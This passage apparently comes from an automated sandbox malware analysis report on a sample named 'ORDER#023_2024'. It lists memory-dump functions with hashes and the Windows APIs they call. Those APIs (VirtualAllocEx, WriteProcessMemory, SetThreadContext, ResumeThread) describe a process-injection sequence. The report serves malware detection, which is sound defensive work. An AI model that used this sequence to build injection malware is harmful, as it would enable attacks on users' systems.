                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 24d206ceb08127fb5d704e7b985dcc6864024f206884cd098eff1ce1615e9edd
                                                                                            • Instruction ID: d9425ccd1d6d710a4c5a1fe1c8bc0e05060f5e7c128378f6c3bc7e610683b164
                                                                                            • Opcode Fuzzy Hash: 24d206ceb08127fb5d704e7b985dcc6864024f206884cd098eff1ce1615e9edd
                                                                                            • Instruction Fuzzy Hash: C02144B1D003499FCB10CFA9C880BEEBBF4FF48320F10842AE959A7251C7789944CBA4
                                                                                            Function 02A3CC40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 704 2a3cc40-2a3d634 DuplicateHandle 706 2a3d636-2a3d63c 704->706 707 2a3d63d-2a3d65a 704->707 706->707
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A3D566,?,?,?,?,?), ref: 02A3D627
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: efe1f630d7ad6cf426dd6e7d4c03c3b8c1767b5140767cfb7e049e70508e13f6
                                                                                            • Instruction ID: ebc7624251abd9b8481249578b4666f3c59ff6df4157d7f6c037029381cc14d5
                                                                                            • Opcode Fuzzy Hash: efe1f630d7ad6cf426dd6e7d4c03c3b8c1767b5140767cfb7e049e70508e13f6
                                                                                            • Instruction Fuzzy Hash: 6421E4B5900258DFDB10CF9AD584AEEFFF8EB48324F14841AE958A7310D774A950CFA4
                                                                                            Function 02A3D599 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 710 2a3d599-2a3d59e 711 2a3d5a0-2a3d634 DuplicateHandle 710->711 712 2a3d636-2a3d63c 711->712 713 2a3d63d-2a3d65a 711->713 712->713
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A3D566,?,?,?,?,?), ref: 02A3D627
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: deeccebe0055eca4a23189c5773c2d92cc8a85ead8dfe06437a3312388250b86
                                                                                            • Instruction ID: ea66edf64dce208cce2b94c319d63e31efc603ebf79f72e4eb039bc983a7493e
                                                                                            • Opcode Fuzzy Hash: deeccebe0055eca4a23189c5773c2d92cc8a85ead8dfe06437a3312388250b86
                                                                                            • Instruction Fuzzy Hash: 5221E3B5900248DFDB10CFAAD584ADEFBF4EB48324F14841AE958A7310D374A940CFA5
                                                                                            Function 06F55EFA Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 716 6f55efa-6f55f4b 718 6f55f4d-6f55f59 716->718 719 6f55f5b-6f55f8b Wow64SetThreadContext 716->719 718->719 721 6f55f94-6f55fc4 719->721 722 6f55f8d-6f55f93 719->722 722->721
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F55F7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 0905978806c150595ad5401ff7ddb3b95bf5d32ce8e146207fab52273bb1108a
                                                                                            • Instruction ID: cfd376b1750186e2b64703bf66cdb0b39150c4bfe3bbda2617638447e1a6006b
                                                                                            • Opcode Fuzzy Hash: 0905978806c150595ad5401ff7ddb3b95bf5d32ce8e146207fab52273bb1108a
                                                                                            • Instruction Fuzzy Hash: 952138B1D002498FDB10CFAAC4847EEFBF4AF88324F14842ED559A7240C7789945CFA4
                                                                                            Function 06F565BB Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 726 6f565bb-6f5664d ReadProcessMemory 730 6f56656-6f56686 726->730 731 6f5664f-6f56655 726->731 731->730
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06F56640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 16763782e647d8d94258b38564f04374ed097c6715bc434f3fc34b9ee59d3288
                                                                                            • Instruction ID: e853ebadd4d6873031c64a39b0e7beebe149b377554789600d6f25cffed5ac9c
                                                                                            • Opcode Fuzzy Hash: 16763782e647d8d94258b38564f04374ed097c6715bc434f3fc34b9ee59d3288
                                                                                            • Instruction Fuzzy Hash: 842116B1C003599FCB10DFAAC881AEEFBF5FF48320F50842AE959A7250D7349944CBA4
                                                                                            Function 06F55F00 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F55F7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 7444a6f2692f100a7b025680bd1081df10a16189c3fafb4cdcd833d896439b4f
                                                                                            • Instruction ID: 249ba07c513f84d6be60c185daeb046ad389312ebedcb18b186353e262601958
                                                                                            • Opcode Fuzzy Hash: 7444a6f2692f100a7b025680bd1081df10a16189c3fafb4cdcd833d896439b4f
                                                                                            • Instruction Fuzzy Hash: B62107B1D002098FDB10DFAAC4857EEBBF4AB49324F148429D959A7240D778A945CFA5
                                                                                            Function 06F565C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06F56640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 0fea3dc88e5079533117c520d60be0ab50279f3154ce1de406e269d26a473ccf
                                                                                            • Instruction ID: 8e935666e5ebf13a25a0893da4168c276326c699d2588b1539077c0c32181e0e
                                                                                            • Opcode Fuzzy Hash: 0fea3dc88e5079533117c520d60be0ab50279f3154ce1de406e269d26a473ccf
                                                                                            • Instruction Fuzzy Hash: 712116B1C003599FCB10DFAAC881AEEFBF5FF48320F50842AE958A7250D7349944CBA4
                                                                                            Function 06F56408 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06F5647E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 3ba52bef306f01a60dee1421c9840207b6b5c99e9c0d31f382c365d889076207
                                                                                            • Instruction ID: 596de87de6cc360ca18be07c5c83dd1012151e1582cf13e27e6f92ec8f278e8b
                                                                                            • Opcode Fuzzy Hash: 3ba52bef306f01a60dee1421c9840207b6b5c99e9c0d31f382c365d889076207
                                                                                            • Instruction Fuzzy Hash: 091159B28002499FCB10DFA9C844BDEFFF5EF88324F148419E559A7250C739A940CFA4
                                                                                            Function 06F56410 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06F5647E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 150b7b52bbcb1526142c1cecabfe44b6f874ccfe604890a19ffcc99e09d81421
                                                                                            • Instruction ID: 17b1458e4fd6a839508c5746a9109dbd7746f56a68023ef90a2374c6bccf0b2c
                                                                                            • Opcode Fuzzy Hash: 150b7b52bbcb1526142c1cecabfe44b6f874ccfe604890a19ffcc99e09d81421
                                                                                            • Instruction Fuzzy Hash: 611137719002499FCB10DFAAC844BEEFFF5EF88324F108419E959A7250C775A944CFA4
                                                                                            Function 06F55E4A Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 0a4afeb15551ab8e8668f05949f1801948881896ac11e86b515ad9e5980b3c80
                                                                                            • Instruction ID: aedad9c37be67ff4dd278e7e2011bc22dd198f35c4805386b0e5a15f2ddf5137
                                                                                            • Opcode Fuzzy Hash: 0a4afeb15551ab8e8668f05949f1801948881896ac11e86b515ad9e5980b3c80
                                                                                            • Instruction Fuzzy Hash: A31128B1D002498FCB10DFAAC4447EEFBF5EF88324F208429D559A7250C735A945CF95
                                                                                            Function 06F55E50 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: f5157abdde72536d5b6d5b6a3297e854d799c12796903b3d0cffed458a415578
                                                                                            • Instruction ID: 34fea6d52e54baf33e90716fc8907757deac891fb4ebe76e4ec1573fbfde4c20
                                                                                            • Opcode Fuzzy Hash: f5157abdde72536d5b6d5b6a3297e854d799c12796903b3d0cffed458a415578
                                                                                            • Instruction Fuzzy Hash: D41125B1D042488BCB20DFAAC4457EEFBF5AB88324F208429D559A7250CA75A944CFA4
                                                                                            Function 06F59368 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F593CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: 52388954438dbdcca50a6dc39192545a1e9e400eeb94eab9eda214cd4d05ec41
                                                                                            • Instruction ID: 5dc32fb532e66fa0c931eaaf2ad22838cd7b9e31c5321283aabcac70ccc5a05d
                                                                                            • Opcode Fuzzy Hash: 52388954438dbdcca50a6dc39192545a1e9e400eeb94eab9eda214cd4d05ec41
                                                                                            • Instruction Fuzzy Hash: 2211C2B5800349DFDB10DF9AD885BDEFBF8EB48324F108419E958A7250D375A984CFA5
                                                                                            Function 02A3B2C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02A3B326
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 2d2dccef9c23b5f6bbacc1d422c49b1a4ae5f82f15a721d8e9870d8e5ac88f90
                                                                                            • Instruction ID: 35a5f77ef6fb5c39354110f5723c130ff82389524f8639a6b27f873d014a876e
                                                                                            • Opcode Fuzzy Hash: 2d2dccef9c23b5f6bbacc1d422c49b1a4ae5f82f15a721d8e9870d8e5ac88f90
                                                                                            • Instruction Fuzzy Hash: 25113FB1C003488FCB10CF9AD444ADEFBF4EF88228F10886AD828A7600C374A545CFA0
                                                                                            Function 06F56788 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F593CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: 2eb14208eb2048a628fe303d7a3381b3f0ea7a4ff6db92d23d5e84d38bad11b4
                                                                                            • Instruction ID: 89ad669bf1e35d0bde9f06891d16f6f724a1fe6f81d44a735e8eb5cd07f18067
                                                                                            • Opcode Fuzzy Hash: 2eb14208eb2048a628fe303d7a3381b3f0ea7a4ff6db92d23d5e84d38bad11b4
                                                                                            • Instruction Fuzzy Hash: 551106B5800348DFDB10DF9AD485BDEFBF8EB48320F108459E959A7240D375A944CFA5
                                                                                            Function 00EDD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678691534.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_edd000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9529ba93be08481d7d2715b40dea968a9bc71c0957333ec6272c2e221d17882f
                                                                                            • Instruction ID: 51d6c59938096d9feedc563a9ecb8e70fe9a350cb9b2069e8e2bccca3442e71e
                                                                                            • Opcode Fuzzy Hash: 9529ba93be08481d7d2715b40dea968a9bc71c0957333ec6272c2e221d17882f
                                                                                            • Instruction Fuzzy Hash: C1210371548240DFCB05DF14EDC0B26BF65FB98318F20C56AE8095B356C336D856CBA1
                                                                                            Function 00EED01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678748444.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_eed000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 734b9d408614d1fddfd1a57f6ece971b701fee05ff99768fdb18c7953da918c4
                                                                                            • Instruction ID: dbff7f59790b7ba3318195a77e1d214506318c392e1d8c79f67f5b70defdcd13
                                                                                            • Opcode Fuzzy Hash: 734b9d408614d1fddfd1a57f6ece971b701fee05ff99768fdb18c7953da918c4
                                                                                            • Instruction Fuzzy Hash: 5F210471608288DFCB14DF15D9C4B26BFA6FB84318F28C56DD80A5B296C33BD847CA61
                                                                                            Function 00EED005 Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678748444.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_eed000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5403cc0109cf9fe312c69abdec7f9b4041acce8d6bc0b3dcd34f0a5f189947a7
                                                                                            • Instruction ID: 9a659ae817d2aec47678287fce642f6845f0a84cc3b86a0c5e75b23106be9ac7
                                                                                            • Opcode Fuzzy Hash: 5403cc0109cf9fe312c69abdec7f9b4041acce8d6bc0b3dcd34f0a5f189947a7
                                                                                            • Instruction Fuzzy Hash: C42141755093C48FDB12CF24D994715BF72EB46214F28C5EAD8498B6A7C33A980ACB62
                                                                                            Function 00EDD4BF Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678691534.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_edd000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction ID: e96ca613347104f0728a7c746d39f5bcc5071eb778b5da9b9f82332ba3f393ee
                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                            • Instruction Fuzzy Hash: DE11D376504280DFCB16CF14E9C4B16BF71FB94328F24C6AAD8494B756C336D85ACBA1
                                                                                            Function 00EDD731 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678691534.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_edd000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4dacdb2f62d5e6a96cb6ad7bcb7f1c3d417f2091a3c147b717cd9bf1b5871cc1
                                                                                            • Instruction ID: 3ca8a72e980e5e14aaf552f09c1f87a121acde17e44a333c8f8819745e20e8e8
                                                                                            • Opcode Fuzzy Hash: 4dacdb2f62d5e6a96cb6ad7bcb7f1c3d417f2091a3c147b717cd9bf1b5871cc1
                                                                                            • Instruction Fuzzy Hash: 4A01A77100D3449AE7104A25CD847A7FF98EF45328F18D5ABED095E396C279DC45C6B1
                                                                                            Function 00EDD730 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1678691534.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_edd000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8ba7105b72ae69ac2b35a7af09b1c8765fbca93ef9058f669d8fe4cc5da4066c
                                                                                            • Instruction ID: dd95920e0d7c763fcbaa545fae3e0e1175786cf9e763808646f421962c93a5a5
                                                                                            • Opcode Fuzzy Hash: 8ba7105b72ae69ac2b35a7af09b1c8765fbca93ef9058f669d8fe4cc5da4066c
                                                                                            • Instruction Fuzzy Hash: 1CF0C2710083449AE7108A16CC84B62FFA8EF95338F18C45BED081E282C2799C44CAB0

                                                                                            Non-executed Functions

                                                                                            Function 06F5A188 Relevance: .4, Instructions: 350COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 13a2f1e71d730dfd0b8125ecfbace6fbe2b409b595ac74e24204016684a10c78
                                                                                            • Instruction ID: 4214049e28dd10c2c4f44bc5042467e1bd0b3ac1c7d6cbbd79f6306244ddcf71
                                                                                            • Opcode Fuzzy Hash: 13a2f1e71d730dfd0b8125ecfbace6fbe2b409b595ac74e24204016684a10c78
                                                                                            • Instruction Fuzzy Hash: 8FD1BB30B016108FDB69DB79C950BAEB7F7AF89300F154569D68A8B2A1DF39EC01CB51
                                                                                            Function 06F53E20 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 77771f2b63735fa7a7e3a86a2013038dd7e7f51303228b112cd9e841a3dd9529
                                                                                            • Instruction ID: fe8654b03dbefb077a8a45b7ec934f7e7bbd05a416cf7d853404e834e78a1f22
                                                                                            • Opcode Fuzzy Hash: 77771f2b63735fa7a7e3a86a2013038dd7e7f51303228b112cd9e841a3dd9529
                                                                                            • Instruction Fuzzy Hash: 37E1FA74E001198FCB54DF99C5819AEFBF2BF89304F249159E915AB356DB30AD81CF60
                                                                                            Function 06F55628 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cd24f2807e040d511ade49d7dd21b68e78dfd0edb0152d5cd57f5a65b94e623e
                                                                                            • Instruction ID: d0f6c35720846ee40c7555d5846ec3e73273ad5aedd6b29524a1c85930e8e7a0
                                                                                            • Opcode Fuzzy Hash: cd24f2807e040d511ade49d7dd21b68e78dfd0edb0152d5cd57f5a65b94e623e
                                                                                            • Instruction Fuzzy Hash: 5DE10974E001198FCB14DFA9C5819AEFBB2BF89305F248169D914AB35ADB30AD41CFA1
                                                                                            Function 06F55FD8 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15e21ddf4da697688da388d220f14f5c5520d8b4abbd501a5086892115f78608
                                                                                            • Instruction ID: a3d16ff2406f3f3b606ccb303d7efcb19298703be7196e0cb27f92c15ce41bc9
                                                                                            • Opcode Fuzzy Hash: 15e21ddf4da697688da388d220f14f5c5520d8b4abbd501a5086892115f78608
                                                                                            • Instruction Fuzzy Hash: 73E1F974E001198FDB54DFA9C5819AEFBB2FF89304F249169E914AB356DB30AD41CFA0
                                                                                            Function 06F535B0 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 57df6db912c2b7f7b266f0b9929fc1d1f4f2d4cb613b3d7a91db9355a4fd2a86
                                                                                            • Instruction ID: 6bfbfc68bbedfc0a89ee62054cb58ff4684631b35b3db7738b28545dede72aa5
                                                                                            • Opcode Fuzzy Hash: 57df6db912c2b7f7b266f0b9929fc1d1f4f2d4cb613b3d7a91db9355a4fd2a86
                                                                                            • Instruction Fuzzy Hash: D3E10AB5E041198FCB14DFA9C5819AEFBF2BF89304F248169D914AB35ADB30AD41CF61
                                                                                            Function 06F539E8 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 74098ee4919b90d5b204ea1dd666be68df1fdb2af2e34326a3d65d557021ef4d
                                                                                            • Instruction ID: d4ebe75b92541e2abd661b8e0c6cb4bae2cca36ef62169de3563f9e324339f43
                                                                                            • Opcode Fuzzy Hash: 74098ee4919b90d5b204ea1dd666be68df1fdb2af2e34326a3d65d557021ef4d
                                                                                            • Instruction Fuzzy Hash: F1E1F675E001198FCB14DFA9C5819AEFBF2BF89304F248169E914AB356DB30AD41CFA1
                                                                                            Function 02A3DF14 Relevance: .3, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0462605c91b6437f2267fc2d12ad302daf9fe2c121351de9ea6299c34f7dfa57
                                                                                            • Instruction ID: 88794095fc0d7c84c2a09a7c635775f589aaac856b77f462821161d30bec9e77
                                                                                            • Opcode Fuzzy Hash: 0462605c91b6437f2267fc2d12ad302daf9fe2c121351de9ea6299c34f7dfa57
                                                                                            • Instruction Fuzzy Hash: 87A16932E10615CFCF16DFA4C98059EB7B2BF84304B25856AF906EB265DF71E916CB80
